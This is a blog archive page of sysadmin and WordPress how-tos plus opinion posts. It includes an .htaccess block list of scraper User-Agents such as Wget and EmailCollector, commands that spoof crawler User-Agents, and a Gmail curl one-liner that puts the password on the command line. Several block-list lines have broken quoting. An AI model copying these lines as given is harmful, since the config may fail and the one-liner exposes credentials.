Posts Tagged ‘article’

Block Web server overloading by Bad Crawler Bots and Search Engine Spiders with .htaccess rules

Monday, September 18th, 2017

howto-block-webserver-overloading-bad-crawler-bots-spiders-with-htaccess-modrewrite-rules-file

In my last post, I talked about the problem of Search Index Crawler Robots aggressively crawling websites and how to stop them (the article is here), explaining how to raise delays between Bot URL requests to a website and how to completely prohibit some bots from crawling via robots.txt.
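For reference, the robots.txt approach from that post boils down to entries like the following (the bot name and delay value here are purely illustrative – well-behaved crawlers honour such directives, bad bots usually don't):

User-agent: *
Crawl-delay: 10

User-agent: SomeAggressiveBot
Disallow: /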

As explained in that article, the consequence of too many badly written or aggressively behaving Spiders is "server stoning" and therefore degraded Web Server performance, or even a short-time Denial of Service, depending on how well the initial Server scaling was done.

Just for information, the bots we want to filter are not to be confused with the legitimate bots that drive real traffic to your website.

The 10 most popular Web Crawler Bots as of the time of writing are:
 

1. GoogleBot (the Google Crawler bot; funnily, the bots become less active on Saturdays and Sundays :))

2. BingBot (the Bing.com Crawler bot)

3. SlurpBot (also famous as Yahoo! Slurp)

4. DuckDuckBot (the duckduckgo.com search engine crawler bot)

5. Baiduspider (the most famous Chinese search engine, used as a substitute for Google in China)

6. YandexBot (the Russian Yandex Search engine crawler bot, used in Russia as a substitute for Google)

7. Sogou Spider (a leading Chinese Search Engine launched in 2004)

8. Exabot (the crawler for the French ExaLead Search Engine, launched in 2000)

9. FaceBot (Facebook External Hit; this crawler fetches a webpage only once a user shares or pastes a link to a video, music, a blog post or whatever in chat to another user)

10. Alexa Crawler (ia_archiver is the web crawler for Amazon's Alexa Internet Rankings; Alexa is a great site to evaluate the approximate popularity of a page on the internet, and the Alexa SiteInfo page has historically been the Swiss Army knife for anyone wanting to quickly evaluate a webpage's approximate ranking compared to other pages)

The above legitimate bots are known to follow most if not all W3C – World Wide Web Consortium (W3.org) standards and therefore respect the allowance or restriction commands a site gives them in robots.txt. Unfortunately, many of the so-called Bad-Bots or mirroring scripts that burn your Web Server CPU and Memory, mentioned in the previous article, follow the /robots.txt prescriptions only partially or not at all.

Hence, for the bots that do not respect robots.txt, the only way to get rid of most of the web spiders that are just loading your bandwidth and server hardware is to filter / block them using Apache's mod_setenvif / mod_rewrite rules placed in a .htaccess file.

If it does not already exist, create the .htaccess file in the DocumentRoot of your website with whatever text editor you like, or create it on your Windows / Mac OS desktop and transfer it via FTP / SecureFTP to the server.

I prefer to do it directly on the server with vim (text editor):

 

 

vim /var/www/sites/your-domain.com/.htaccess

 

RewriteEngine On

IndexIgnore .htaccess */.??* *~ *# */HEADER* */README* */_vti*

SetEnvIfNoCase User-Agent "^Black Hole” bad_bot
SetEnvIfNoCase User-Agent "^Titan bad_bot
SetEnvIfNoCase User-Agent "^WebStripper" bad_bot
SetEnvIfNoCase User-Agent "^NetMechanic" bad_bot
SetEnvIfNoCase User-Agent "^CherryPicker" bad_bot
SetEnvIfNoCase User-Agent "^EmailCollector" bad_bot
SetEnvIfNoCase User-Agent "^EmailSiphon" bad_bot
SetEnvIfNoCase User-Agent "^WebBandit" bad_bot
SetEnvIfNoCase User-Agent "^EmailWolf" bad_bot
SetEnvIfNoCase User-Agent "^ExtractorPro" bad_bot
SetEnvIfNoCase User-Agent "^CopyRightCheck" bad_bot
SetEnvIfNoCase User-Agent "^Crescent" bad_bot
SetEnvIfNoCase User-Agent "^Wget" bad_bot
SetEnvIfNoCase User-Agent "^SiteSnagger" bad_bot
SetEnvIfNoCase User-Agent "^ProWebWalker" bad_bot
SetEnvIfNoCase User-Agent "^CheeseBot" bad_bot
SetEnvIfNoCase User-Agent "^Teleport" bad_bot
SetEnvIfNoCase User-Agent "^TeleportPro" bad_bot
SetEnvIfNoCase User-Agent "^MIIxpc" bad_bot
SetEnvIfNoCase User-Agent "^Telesoft" bad_bot
SetEnvIfNoCase User-Agent "^Website Quester" bad_bot
SetEnvIfNoCase User-Agent "^WebZip" bad_bot
SetEnvIfNoCase User-Agent "^moget/2.1" bad_bot
SetEnvIfNoCase User-Agent "^WebZip/4.0" bad_bot
SetEnvIfNoCase User-Agent "^WebSauger" bad_bot
SetEnvIfNoCase User-Agent "^WebCopier" bad_bot
SetEnvIfNoCase User-Agent "^NetAnts" bad_bot
SetEnvIfNoCase User-Agent "^Mister PiX" bad_bot
SetEnvIfNoCase User-Agent "^WebAuto" bad_bot
SetEnvIfNoCase User-Agent "^TheNomad" bad_bot
SetEnvIfNoCase User-Agent "^WWW-Collector-E" bad_bot
SetEnvIfNoCase User-Agent "^RMA" bad_bot
SetEnvIfNoCase User-Agent "^libWeb/clsHTTP" bad_bot
SetEnvIfNoCase User-Agent "^asterias" bad_bot
SetEnvIfNoCase User-Agent "^httplib" bad_bot
SetEnvIfNoCase User-Agent "^turingos" bad_bot
SetEnvIfNoCase User-Agent "^spanner" bad_bot
SetEnvIfNoCase User-Agent "^InfoNaviRobot" bad_bot
SetEnvIfNoCase User-Agent "^Harvest/1.5" bad_bot
SetEnvIfNoCase User-Agent "Bullseye/1.0" bad_bot
SetEnvIfNoCase User-Agent "^Mozilla/4.0 (compatible; BullsEye; Windows 95)" bad_bot
SetEnvIfNoCase User-Agent "^Crescent Internet ToolPak HTTP OLE Control v.1.0" bad_bot
SetEnvIfNoCase User-Agent "^CherryPickerSE/1.0" bad_bot
SetEnvIfNoCase User-Agent "^CherryPicker /1.0" bad_bot
SetEnvIfNoCase User-Agent "^WebBandit/3.50" bad_bot
SetEnvIfNoCase User-Agent "^NICErsPRO" bad_bot
SetEnvIfNoCase User-Agent "^Microsoft URL Control – 5.01.4511" bad_bot
SetEnvIfNoCase User-Agent "^DittoSpyder" bad_bot
SetEnvIfNoCase User-Agent "^Foobot" bad_bot
SetEnvIfNoCase User-Agent "^WebmasterWorldForumBot" bad_bot
SetEnvIfNoCase User-Agent "^SpankBot" bad_bot
SetEnvIfNoCase User-Agent "^BotALot" bad_bot
SetEnvIfNoCase User-Agent "^lwp-trivial/1.34" bad_bot
SetEnvIfNoCase User-Agent "^lwp-trivial" bad_bot
SetEnvIfNoCase User-Agent "^Wget/1.6" bad_bot
SetEnvIfNoCase User-Agent "^BunnySlippers" bad_bot
SetEnvIfNoCase User-Agent "^Microsoft URL Control – 6.00.8169" bad_bot
SetEnvIfNoCase User-Agent "^URLy Warning" bad_bot
SetEnvIfNoCase User-Agent "^Wget/1.5.3" bad_bot
SetEnvIfNoCase User-Agent "^LinkWalker" bad_bot
SetEnvIfNoCase User-Agent "^cosmos" bad_bot
SetEnvIfNoCase User-Agent "^moget" bad_bot
SetEnvIfNoCase User-Agent "^hloader" bad_bot
SetEnvIfNoCase User-Agent "^humanlinks" bad_bot
SetEnvIfNoCase User-Agent "^LinkextractorPro" bad_bot
SetEnvIfNoCase User-Agent "^Offline Explorer" bad_bot
SetEnvIfNoCase User-Agent "^Mata Hari" bad_bot
SetEnvIfNoCase User-Agent "^LexiBot" bad_bot
SetEnvIfNoCase User-Agent "^Web Image Collector" bad_bot
SetEnvIfNoCase User-Agent "^The Intraformant" bad_bot
SetEnvIfNoCase User-Agent "^True_Robot/1.0" bad_bot
SetEnvIfNoCase User-Agent "^True_Robot" bad_bot
SetEnvIfNoCase User-Agent "^BlowFish/1.0" bad_bot
SetEnvIfNoCase User-Agent "^JennyBot" bad_bot
SetEnvIfNoCase User-Agent "^MIIxpc/4.2" bad_bot
SetEnvIfNoCase User-Agent "^BuiltBotTough" bad_bot
SetEnvIfNoCase User-Agent "^ProPowerBot/2.14" bad_bot
SetEnvIfNoCase User-Agent "^BackDoorBot/1.0" bad_bot
SetEnvIfNoCase User-Agent "^toCrawl/UrlDispatcher" bad_bot
SetEnvIfNoCase User-Agent "^WebEnhancer" bad_bot
SetEnvIfNoCase User-Agent "^TightTwatBot" bad_bot
SetEnvIfNoCase User-Agent "^suzuran" bad_bot
SetEnvIfNoCase User-Agent "^VCI WebViewer VCI WebViewer Win32" bad_bot
SetEnvIfNoCase User-Agent "^VCI" bad_bot
SetEnvIfNoCase User-Agent "^Szukacz/1.4" bad_bot
SetEnvIfNoCase User-Agent "^QueryN Metasearch" bad_bot
SetEnvIfNoCase User-Agent "^Openfind data gathere" bad_bot
SetEnvIfNoCase User-Agent "^Openfind" bad_bot
SetEnvIfNoCase User-Agent "^Xenu’s Link Sleuth 1.1c" bad_bot
SetEnvIfNoCase User-Agent "^Xenu’s" bad_bot
SetEnvIfNoCase User-Agent "^Zeus" bad_bot
SetEnvIfNoCase User-Agent "^RepoMonkey Bait & Tackle/v1.01" bad_bot
SetEnvIfNoCase User-Agent "^RepoMonkey" bad_bot
SetEnvIfNoCase User-Agent "^Zeus 32297 Webster Pro V2.9 Win32" bad_bot
SetEnvIfNoCase User-Agent "^Webster Pro" bad_bot
SetEnvIfNoCase User-Agent "^EroCrawler" bad_bot
SetEnvIfNoCase User-Agent "^LinkScan/8.1a Unix" bad_bot
SetEnvIfNoCase User-Agent "^Keyword Density/0.9" bad_bot
SetEnvIfNoCase User-Agent "^Kenjin Spider" bad_bot
SetEnvIfNoCase User-Agent "^Cegbfeieh" bad_bot

 

<Limit GET POST>
order allow,deny
allow from all
Deny from env=bad_bot
</Limit>

 


The above bad-bot prohibition rules include the RewriteEngine On directive; however, for many websites this directive is already enabled directly in the VirtualHost section for the domain(s). If that is your case, you can remove RewriteEngine On from the .htaccess file and the bad-bot prohibition rules will still continue to work.
The above rules are also perfectly suitable for WordPress-based websites / blogs in case you need to filter out obstructive spiders, though they will work on any website domain with mod_rewrite enabled.
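If you prefer to do the blocking with mod_rewrite itself (which the RewriteEngine On line above enables) instead of relying on SetEnvIfNoCase, a roughly equivalent sketch covering just a few of the same User-Agents – extend the pattern list as needed – would be:

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (WebStripper|EmailCollector|WebZip|SiteSnagger|Teleport) [NC]
RewriteRule .* - [F,L]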

Once you have implemented the above rules, you will not need to restart Apache, as .htaccess is read dynamically on each client request to the Webserver.
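To verify the rules are actually triggering, you can watch the webserver access log for 403 responses while a blocked agent hits the site (the log path below is the Debian / Ubuntu default – adjust it for your distribution):

tail -f /var/log/apache2/access.log | grep ' 403 '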

2. Testing that the .htaccess Bad Bot Filtering Works as Expected


In order to test that the new Bad Bot filtering configuration is working properly, there is a manual and somewhat more complicated way with lynx (the text browser), assuming you have shell access to a Linux / BSD / *NIX computer, or are running your own *NIX server / desktop.
 

Here is how:
 

 

lynx -useragent="Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)" -head -dump http://www.your-website-filtering-bad-bots.com/

 

 

Note that lynx will provide a warning such as:

Warning: User-Agent string does not contain "Lynx" or "L_y_n_x"!

Just ignore it and press enter to continue.

Two other use cases for lynx that I have historically used heavily are to pretend you are GoogleBot or GoogleBot-Mobile, in order to see how Google actually sees your website:
 

  • Pretend with Lynx You're GoogleBot

 

lynx -useragent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" -head -dump http://www.your-domain.com/

 

 

  • How to Pretend with Lynx Browser You are GoogleBot-Mobile

 

lynx -useragent="Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)" -head -dump http://www.your-domain.com/

 


Or, for the lazy ones that don't have Linux / *NIX at their disposal, you can use the WannaBrowser website.

WannaBrowser is a web-based browser emulator which gives you the ability to change the User-Agent on each website request, so just set your User-Agent to any bot we just filtered, for example CheeseBot.

The .htaccess rules added earlier, once they detect that your browser client is coming in with a prohibited User-Agent, will immediately filter you out and you'll be unable to access the website, getting a response like:
 

HTTP/1.1 403 Forbidden
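If you have curl at hand, the same check can be done straight from the command line by spoofing the User-Agent (the domain is the same placeholder as above) – the blocked agent should get a 403, a normal browser agent a 200:

curl -I -A "CheeseBot" http://www.your-website-filtering-bad-bots.com/
curl -I -A "Mozilla/5.0" http://www.your-website-filtering-bad-bots.com/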

 

As I've talked a lot about Index Bots, I think it is worth also mentioning three great websites that can give you a lot of up-to-date information on the exact user-agents Spiders return, commonly known Bot traits, as well as a currently updated list of Bad Bots etc.

Bot and Browser resources with information on user-agents, bad-bots and odd Crawler and Bot specifics:

1. botreports.com
2. user-agents.org
3. useragentapi.com

 

An updated list of robot user-agents (crawler-user-agents) is also available on GitHub here, regularly updated by Caia Almeido.

There are also third-party plugins (modules) available for Website Platforms like WordPress / Joomla / TYPO3 etc.

Besides the Bad and Good Bots listed on these websites, there are perhaps a hundred others that might end up crawling your website and might or might not need to be filtered. Therefore, before proceeding with any filtering steps it is generally a good idea to monitor your HTTPD access.log / error.log, as if you happen to mistakenly filter the wrong bot this might be a cause of Website Indexing Problems.

Hope this article gives you some valuable information. Enjoy! 🙂

 

Remove URL from comments in WordPress Blogs and Websites to mitigate comment spam URLs in pages

Friday, February 20th, 2015

remove-comment-spam-url-field-wordpress-website-or-blog-working-how-to
If you're running a WordPress blog or Website where you have enabled comments for a page, and your article or page is well indexed in Google (receives a lot of visits / reads daily), your site's posts (comments) section is sure to quickly fill up with a lot of "Thank you" and nonsense Spam comments containing an ugly link to an external SPAM or Phishing website.

Such URL links with a nonsense message are a favourite way for SPAMmers to raise their website's incoming (from other websites) "InLinks" and through that improve their current Search Engine position.

We all know a lot of comment SPAM is generally handled well by Akismet, but unfortunately many such spam comments still fail to be identified as Spam, because spam Bots (text-generator algorithms) become more and more sophisticated with time; also, you can never stop paid real-person Marketers from spamming you with smartly crafted messages to increase their site's SEO.
In all those cases the Akismet WP (Anti-Spam) plugin – which btw is among the first "must have" WP extensions to install on a new blog / website – will not be enough ..

To fight the worsening SEO caused by spam URLs and keep your site's SEO healthy (having a lot of links pointing to reported spam sites will reduce your overall SEO Index Rate), many WordPress-based bloggers choose not to use the default WordPress Comments capabilities – e.g. they use external commenting systems such as Disqus (a Web Community of Communities), IntenseDebate, LiveFyre, Vicomi.

However, as Disqus and other 3rd-party commenting systems are proprietary software (you don't have access to the comment data, as comments are kept on the proprietary platform and shown from there), I don't personally recommend (or use) those. Yes, Disqus, Google+, Facebook and other external comment sources can have a positive impact on your SEO, but that's a temporary effect, and in the long run I think it is more advantageous to keep the comments yourself.
A small note for people using Disqus and Facebook as comment platforms – just imagine: if Disqus or Facebook goes bankrupt in the future, where will your comments be? 🙂

So, assuming you're a novice blogger and I succeeded in convincing you to stick to the standard (embedded) WordPress Comment System, once your site becomes famous you will start getting a severe amount of comment spam. There are plenty of articles already written on how to remove the URL field from the comment form in WordPress, but many of the guides online are old or obsolete, so in this article I will do a short evaluation of a few things I tried to remove comment spam and how I finally managed to stop URL link spam from appearing on the site.
 

1. Hide Comment Author Link (Hide-wp-comment-author-link)

This plugin is the best one I found and I have been using it since yesterday. I warmly recommend it because it's very easy: Download, Unzip, Activate, and there you are – anything typed in the URL field will no longer appear in Posts (note that the URL field will stay, so if you want to keep track of a person's input URL you can still see it in Wp-Admin). I'm using the default WordPress theme (Kubrick), but I guess it is supposed to work with most newer WordPress themes. If you test it on another theme please drop a comment to say whether it works for you. Hide Comment Author Link works on the current latest WordPress 4.1 websites.

A similar plugin to hide-wp-comment-author-link that you can try is Hide-n-Disable-comment-url-field; I tested this one, but for some reason I couldn't make it work.

wordpress-remove-delete-hide-n-disable-url-comment-without-deleting-the-form-url-field-screenshot-reduce-comment-spam
Whatever I type in the Website field of the above form is wiped out of the comment once submitted 🙂
 

2. Disable hide Comment URL (disable-hide-comment-url)

I've seen reports that disable-hide-comment-url works on WordPress 3.9.1, but it didn't work for me. The plugin is also old and seems no longer maintained (its last update was 3.5 years ago); if it works for you please drop your WP version in a comment – on WP 4.1 it is not working.

disable-hide-comment-url-screenshot-plugin-to-disable-comment-url-spam-in-wordpress-sites
 


3. WordPress Anti-Spam plugin

WordPress Anti-Spam plugin is a very useful additional plugin to install next to Akismet. The plugin is great if you don't want to stop the commenter URL from showing in the post but want to cut out a lot of the annoying Spam Robots crawling your site.
 

Anti-spam plugin blocks spam in comments automatically, invisibly for users and for admins.

  • no captcha, because spam is not users' problem
  • no moderation queues, because spam is not administrators' problem
  • no options, because it is great to forget about spam completely

The plugin is easy to use: just install it and it just works.

The Anti-spam plugin works fine on WP 4.1.

4. Stop Spam Comments

Stop Spam Comments is:

  • Dead simple: no setup required, just activate it and enjoy your spam-free website.
  • Lightweight: no additional database queries, it doesn't add script files or other assets in your theme. This means your website performance will not be affected and your server will thank you.
  • Invisible by design: no captchas, no tricky questions or any other user interaction required at all.
     

Stop Spam Comments works fine on WP 4.1.

I've mentioned a few of the plugins which can help you solve the problem, but as there are a lot of anti-spam URL plugins available for WP, it's up to you to test and see what fits you best. If you know or use some other method to protect yourself from Comment URL Spam, please share it.

An important thing to note is that it is usually a bad idea to mix different anti-spam plugins, so don't enable both Stop Spam Comments and the WordPress Anti-Spam plugin.

5. Remove the Comment Form URL Field Manually

This South African blog describes a way to remove the URL field manually.

In short, to remove the comment URL field manually, either edit your theme's functions.php (if you have Shell / SSH access) or, if not, do it via the Wp-Admin web interface:
 

WordPress admin page –> Appearance –> Editor


Paste the following PHP code at the end of the file:

 

add_filter('comment_form_default_fields', 'remove_url');
function remove_url($fields)
{
    // drop the Website (URL) field from the default comment form fields
    if (isset($fields['url']))
        unset($fields['url']);
    return $fields;
}


Now, to make the changes take effect, restart the Apache / Nginx Webserver and clean any cache if you're using a plugin like W3 Total Cache etc.

Other good posts describing manual and built-in WordPress ways to reduce / stop comment spam are here and here; however, when it comes to my blog, none of the described manual (code hack) ways I found worked on WordPress v. 4.1.
Thus I personally stuck to using the Hide and Disable Comment URL plugin to get rid of the comment website URL.

Joomla 1.5 fix news css problem partial text (article text not completely showing in Joomla – Category Blog Layout problem)

Monday, October 20th, 2014

joomla-fix-weird-news-blog-article-text-incompletely-shown-category-blog-website-layout-problem

I'm still administering an old, archaic Joomla website built on top of Joomla 1.5. Recently there were some security issues with the website, so I first tried using the jupgrade (Upgrade Joomla 1.5 to Joomla 2.5) plugin to try to resolve them. As there were issues with the upgrade, because the template in use was not available for Joomla 2.5, I decided to continue using Joomla 1.5 and applied the Joomla 1.5 Security Patch. I also had to disable a couple of unused Joomla components and the contact form in order to prevent spammers from randomly spamming through Joomla … the Joomla Security Scanner was mostly useful for fixing the Joomla security holes ..

So far so good – that solved the Joomla security issues – but just recently I was asked to add a new article to the Joomla News section (the news section is configured to serve as a mini site blog, as only a few articles are added every few months). To my surprise, all of a sudden the new Joomla article started displaying its text and pictures only partially. The weird-looking newly added news item looked very much like some kind of template or CSS problem. I tried debugging the HTML code, but unfortunately my CSS knowledge is not that deep, so as a next step I tried to tweak some settings in the Joomla Administrator in the hope that this would resolve why the article text was being cut, even though the text I had placed in the article seemed correctly formatted. I finally got fed up trying to solve the news section layout problem, so I looked online to see whether anyone else had hit the same error, and I stumbled on a Joomla forum thread explaining the Category Blog Layout Problem.

The solution to the incomplete article text showing in Joomla is to go to the Joomla administrator menus:

1. Menus -> Main Menu -> (Click on Menu Item(s) – Edit Menu Item(s)) button
2. Click on News (section)
3. In the Parameters section (on the bottom right of the screen) you will see #Leading set to some low number, for example something like 8 or 9. The whole issue in my case was that I was trying to add more than 8 articles while Leading was set to 8, and in order to add more articles and keep proper leading I had to raise it. To prevent recurring leading errors, I've raised the Leading to 100, as shown in the below screenshot.
joomla-blog-layout-basic-parameters-screenshot-fix-joomla-news-cut-text-problem-screenshot

After raising it to some high number, click Apply and you're done – the problem is solved 🙂
For those curious what the above settings from the screenshot mean:

# Leading Articles -> This refers to the number of articles that are to be shown at full width
# Intro Articles -> This refers to the number of articles that are not to be shown at full width
# Columns -> This refers to the number of columns in which the articles identified as #Intro will be shown. If #Intro is zero, this setting has no effect
# Links -> The number of articles that are to be shown as links. The number of articles should exceed #Leading + #Intro

N.B. Solving this issue took me quite a long time and a lot of attempts. I tried creating the article from scratch, making a copy of an old article etc. At one point I even messed up a few of the news articles so badly that I had to recreate them from scratch. Before doing any changes to obsolete Joomlas, always make a database and file content backup; otherwise you will end up like me, losing 10 hours of your time ..

The bitter experiences with Joomla once again convinced me that, when I have time, I have to migrate this Joomla CMS to WordPress. My experience so far has proved to me that the time and nerves spent learning Joomla, building a multi-lingual website with it, and administering it through Joomla's obscure and cryptic interfaces, plus its multiple security issues, make this CMS unworthy of studying or using. Its difficulty to upgrade from release to release, together with being much slower and having fewer plugins compared to WordPress, makes WordPress a much better (and easier to build and use) platform than Joomla.
So if you happen to be in doubt whether to use Joomla or WordPress to build a new company / community website or a blog, my humble advice is – choose WordPress!

SEO: Best day and time to write new articles and tweet to get more blog reads – Social Network Timing

Tuesday, June 17th, 2014

what-is-best-time-to-write-articles-to-increase-your-blog-traffic

I try to blog regularly, as this gives me a roadmap of what I'm into and how I spend my time. When I have free time, I blog almost daily except on weekends (as on weekends I try to stay away from computers). So if you want to attract more readers to your blog, an interesting question arises:
 

What time is best to hit publish on your posts?

writing-in-the-mogning-on-the-internet-timing-morning-is-best-for-your-posts
Now, there are different angles from which you can draw conclusions on the best timing for a blog post. One major thing always to consider when posting is that the highest percentage of users read blogs in the morning with their morning coffee. Here are some more facts on when web content is read more:

  • 70% of users say they read blogs in the morning
  • More men read blogs at night than women
  • Mondays are the highest-traffic days for average blogs
  • 11 a.m. is normally the highest-traffic hour for blogs
  • Usually most comments are posted on Saturdays
  • Blogs with more than one post a day have a higher chance of inbound links and usually get more unique visitors

As my blog is more technically oriented, most of my visitors are men, and therefore posting at night doesn't interfere much with my readers.
However, I've noticed that for me personally, posting in the time interval from 13:00 to 17:00 positively influences the number of unique visitors the blog gets.

According to research done by Social Fresh, Thursday is the best day to publish an article if you want to get more Social Shares.

Best-Day-to-Blog-to-get-more-shares-in-social-networks

As a rule of thumb Thursday wins 10% more shares than all other days. In fact, 31% of the top 100 social share days in 2011 fell on Thursday.
My logical explanation of this phenomenon is that people tend to get more and more bored with their work and try to entertain themselves more and more as the week progresses.

To get more attention to what I'm writing I use a bit of social networking, but I prefer using only micro-blogging. I use Twitter to share what I'm into. When I write a new article on my blog I tweet its title with a link to the article, because this draws people's attention to what I have to say.

Overall, I am skeptical about social sites like Facebook and MySpace, because they have a negative impact on how people use their time, especially youngsters. Another reason why I don't like Friends Networks is that sites like FB, Google+ or "The Russian Facebook" – Vkontakte (VK.com) – do not respect the privacy of your data.

 

You write fresh content for their website for free and you get nothing!

 

Moreover, by daily posting the latest buzz you read / watched on Facebook etc., or simply saying what's happening with you, where you are now etc., you slowly get addicted to posting – yes, for good or bad, people tend to be maniacal.

By placing all of your personal or impersonal stuff online, you're helping these sites index better in the Google / Yahoo / Yandex search engines, therefore making them profitable and highly ranked websites on the internet, and giving out your personal time for Facebook's profit. Plus, you lose control over your data (your data is not physically on your side, but sits on some remote server somewhere on the internet).
 

Best average times to post on Twitter, Facebook, Google+ and LinkedIn

best-time-and-day-to-write-new-articles-schedule-content-at-the-right-time-on-social-media-to-get-high-trafficrank

So what is the best day and time to Post, Pin or Tweet?

Below is an infographic I found on this blog (the visual data was originally compiled by SurePayRoll), showing visualized results from some extensive research on the topic.

best-time-to-post-and-tweet-blog-articles-social-media-infographic


Here are the most important facts this infographic reveals:


The average best time to post, tweet and pin your new articles is about 15:00 h
 

  • The best timing to post on Twitter is Monday to Thursday from 13:00 to 15:00 h
  • The best timing to post on Facebook is between 13:00 and 16:00 h
  • For LinkedIn it is best to publish between Tuesday and Thursday


Peak times on Facebook, Twitter and LinkedIn

  • Peak time for use of Facebook is on Wednesdays at about 15:00 h
  • Peak times for use of Twitter are Monday to Thursday from 9:00 to 15:00 h
  • LinkedIn peak time is from 17:00 to 18:00 h


Worst times (when users will probably not view your content) on FB, Twitter and LinkedIn

  • Weekends before 08:00  and after 20:00 h
  • Every day after 20:00 h and Fridays after 15:00 h
  • Mondays and Fridays from 22:00 to 06:00 in the morning

Facts about Google+
 

  • Google+ is the fastest growing demographic social network for people aged 45 to 54
  • Best time to share your posts on Google+ is from 09:00 to 10:00 in the morning
     

Images generate more traffic and engagement

  • Including images in your articles increases traffic; tweets with images increase visits, favorites and leads


I'm aware that, as with any research, the above info on the best time to tweet and post is just a generalization, and depending on the field of information posted, the suggested time could differ from the optimal time for an individual writer; however, as a general direction the info is very useful and gives you some idea.
Twitter engagement for brands is 17% higher on weekends according to Dan Zarrella’s research. Tweets posted on Friday, Saturday and Sunday had higher CTR (Click Through Rate) than those posted in the rest of the week.

tweet-on-the-weekends-is-better-for-high-click-through-rate

Another good day to tweet other than the weekend is mid-week, Wednesday.
If your site or blog uses retweets to generate more traffic, the best time to retweet is said to be around 5 pm, when the CTR is higher.

Bulgarian misery net sponsor of European welfare – Statistics on European Union country installments

Tuesday, June 10th, 2014

european-union-fed-by-people-misery-bulgarian-misery-sponsor-of-european-welfare

The Budget of the European Union for 2011 is 142 billion Euro. The main source of budget income is installments from member countries. Installments paid to the EU are about 1% of a country's GDP – and approximately this is the amount of money paid per EU member country.

For Bulgaria the installment is about 426 million euro. The bigger the GDP, the bigger the amount of money the respective country pays into the overall European Union budget. Even though the payments of member countries are only 1% of GDP, this is the source of about 70% of the EU's income.

Another source of money for the European Union community comes from VAT taxes and countries' customs taxes (over imported / exported goods) collected at the external borders of the EU community. Member countries give up 75% of their quota of the customs income collected at the external borders of the EU; only 25% of the money made from customs control of imports flows into the national country budget. In Bulgaria's case we can talk about the imports crossing the borders with Macedonia, Serbia and Turkey. Income from VAT taxes in 2011 is 3.370 billion leva and from customs 131 million leva. What percentage of this money went to the European Union only experts know.
For last year, the Brussels money for Bulgaria is only 1.33 billion Euro (just to compare, Poland received 16.736 billion euro). What is even sadder is that money coming from the European Union for the so-called funds flows into the pockets of well-known oligarchs.

As it looks, even despite the glorification the Bulgarian government gave to the acquisition of these 1.33 billion euro Brussels gifts during the last year, our country still remains a net sponsor of the European budget. This does not include the country's economic losses from membership in the EU, for example the closure of reactors of our Nuclear Power Plant in Kozloduy. In the meantime, about 1% of the budget of the EU community comes from installments from EU employees, unspent money from EU member countries, as well as receipts from fines on firms and companies for breaching laws for the protection of competition and other normative acts.
The primary contributor to the European Union budget is Germany.
 

  • In 2011, Germany paid the EU 27.954 billion euro. This is about 19.7% of all the Union's income.
  • Second to Germany by member-country fee paid to the EU is France with 23.273 billion euros, about 16.4% of all EU income.
  • Third is Italy with 18.447 billion euros, or 13% of the whole EU budget.

As mentioned before, in 2011 the direct installment of Bulgaria is 0.426 billion euro (without VAT quotas and income from taxation). Smaller installments were paid by Estonia, Lithuania, Malta, Cyprus, Luxembourg (!!!) and Slovenia. Even though all these countries have less territory and smaller populations, they are much richer and have a higher GDP per capita!
 

  • Hungary's (10 million people) installment is 1.135 billion euro and Romania's installment (21.7 million people) was 1.419 billion euro.

Finally, let's take a look at the EU installments per capita for some of the member countries.

  • Last year the average European gave 0.78 euro a day for the Brussels bureaucracy!

The question is, how is it possible for everyone to pay 0.78 euro for European Administration, if there is high unemployment in Bulgaria and a lot of people don't receive even 0.78 euro a day?

The money the European Union returns in terms of funds does not create factories or industry, and therefore doesn't create employment and doesn't reduce unemployment.


Do Bulgaria and we Bulgarians really take advantage of the European Union?

The average Bulgarian paid 0.16 euro per day – the lowest individual installment in the Union.
 

  • The average Latvian, Romanian and Lithuanian paid 0.17, 0.18 and 0.24 euro a day respectively.

     

     

    The highest payments come from the citizens of the excessively rich principality:

  • Luxembourg – 1.52 euro a day per person, followed by the Danes, Belgians, Swedes, Dutch, Irish, French and Austrians (ranging from 1.47 euro to 0.98 euro).
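As a rough sanity check of the Bulgarian figure above: 426 million euro divided by a population of roughly 7.3 million people gives about 58 euro per person per year, or around 0.16 euro per day (the population number is approximate).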

As some European Union citizens might not know, a few million Euro of this money is spent on a move of European deputies from Brussels to Strasbourg every month (money given for the travel costs of EU deputies and the physical move of resources from Brussels to Strasbourg). The exact sum spent per year for this meaningless move (made in order to fulfil old European community legislation) varies from 150 to 200 million a year!

Make your WordPress Blog or Site Mobile Friendly with WPTouch plugin

Friday, January 24th, 2014

make your wordpress mobile friendly plugin wordpress mobile seo logo

I bought a new Mobile Phone, replacing my old Nokia Communicator 9300i (powered by Symbian) with a ZTE Blade 3 running Android. I'm not a big fan of mobility myself. However, as I already have it, I decided to test my blog with the Mobile phone's default browser, and my blog theme looked really crappy. Knowing that the number of Mobile devices on the Internet is increasing dramatically these days raises the chance my blog is found by a Mobile user, thus it's nice for my blog to be Mobile ready …

To solve that I did a quick search in Google and found WPTouch – a mobile plugin for WordPress that automatically enables a simple and elegant mobile theme for mobile visitors of your WordPress website.
To install it, I downloaded the plugin into the usual /var/www/blog/wp-content/plugins directory, enabled it, refreshed in the Android Mobile Browser, and my blog appeared great in a theme specially designed for mobile browsers, as you can see in the below screenshot:

my-blog-outlook-in-mobile-android-browser-with-wptouch-wordpress-plugin-screenshot

If you still haven't tried WPTouch, give it a try.
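For reference, the install boils down to a few shell commands; a rough sketch (the download URL is the standard WordPress.org plugin location – double-check it, and adjust the path to your own DocumentRoot):

cd /var/www/blog/wp-content/plugins
wget https://downloads.wordpress.org/plugin/wptouch.zip
unzip wptouch.zip

Then activate WPTouch from the Plugins menu in wp-admin.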

How to quickly check unread Gmail emails on GNU / Linux – one liner script

Monday, April 2nd, 2012

I've hit upon an interesting article explaining how to check unread Gmail email messages in a Linux terminal. The original article is here.

Being able to read your latest Gmail emails in the terminal / console is a great thing, especially for console geeks like me.
Here is the one liner script:

curl -u GMAIL-USERNAME@gmail.com:SECRET-PASSWORD \
--silent "https://mail.google.com/mail/feed/atom" | tr -d '\n' \
| awk -F '<entry>' '{for (i=2; i<=NF; i++) {print $i}}' \
| sed -n "s/<title>\(.*\)<\/title.*<name>\(.*\)<\/name>.*/\2 - \1/p"

